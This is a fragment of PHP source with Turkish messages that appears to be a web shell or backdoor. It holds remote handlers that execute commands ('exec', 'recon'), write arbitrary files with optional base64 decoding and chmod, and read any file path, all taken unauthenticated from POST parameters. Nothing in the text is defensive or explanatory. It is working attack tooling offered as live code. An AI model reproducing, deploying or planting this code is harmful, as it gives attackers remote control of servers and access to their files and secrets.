echo json_encode(array('status' => 'error', 'message' => 'Çalıştırılamadı', 'method' => $used_method));
} else {
echo json_encode(array('status' => 'success', 'output' => $output, 'method' => $used_method));
}
exit;
}
// ===================== write_file =====================
if ($action === 'write_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
$content = isset($_POST['content']) ? $_POST['content'] : '';
$mode = isset($_POST['mode']) ? $_POST['mode'] : '';
$decode = isset($_POST['decode']) ? $_POST['decode'] : '';
$append = isset($_POST['append']) ? $_POST['append'] : '';
if (empty($path)) {
echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş'));
exit;
}
if ($decode === 'base64') {
$content = base64_decode($content);
}
if ($append === '1') {
$r = @file_put_contents($path, $content, FILE_APPEND);
} else {
$r = @file_put_contents($path, $content);
}
if ($r !== false) {
if ($mode) @chmod($path, octdec($mode));
echo json_encode(array('status' => 'success', 'bytes' => $r));
} else {
echo json_encode(array('status' => 'error', 'message' => 'Yazılamadı'));
}
exit;
}
// ===================== read_file =====================
if ($action === 'read_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
if (empty($path)) {
echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş'));
exit;
}
if (!file_exists($path)) {
echo json_encode(array('status' => 'error', 'message' => 'Dosya bulunamadı'));
exit;
}
$content = @file_get_contents($path);
if ($content === false) {
echo json_encode(array('status' => 'error', 'message' => 'Okunamadı'));
} else {
echo json_encode(array('status' => 'success', 'content' => $content, 'size' => strlen($content)));
}
exit;
}
// ===================== Bilinmeyen =====================
echo json_encode(array(
'status' => 'error',
'message' => 'Bilinmeyen komut',
'available' => array('ping','info','recon','exec','write_file','read_file')
));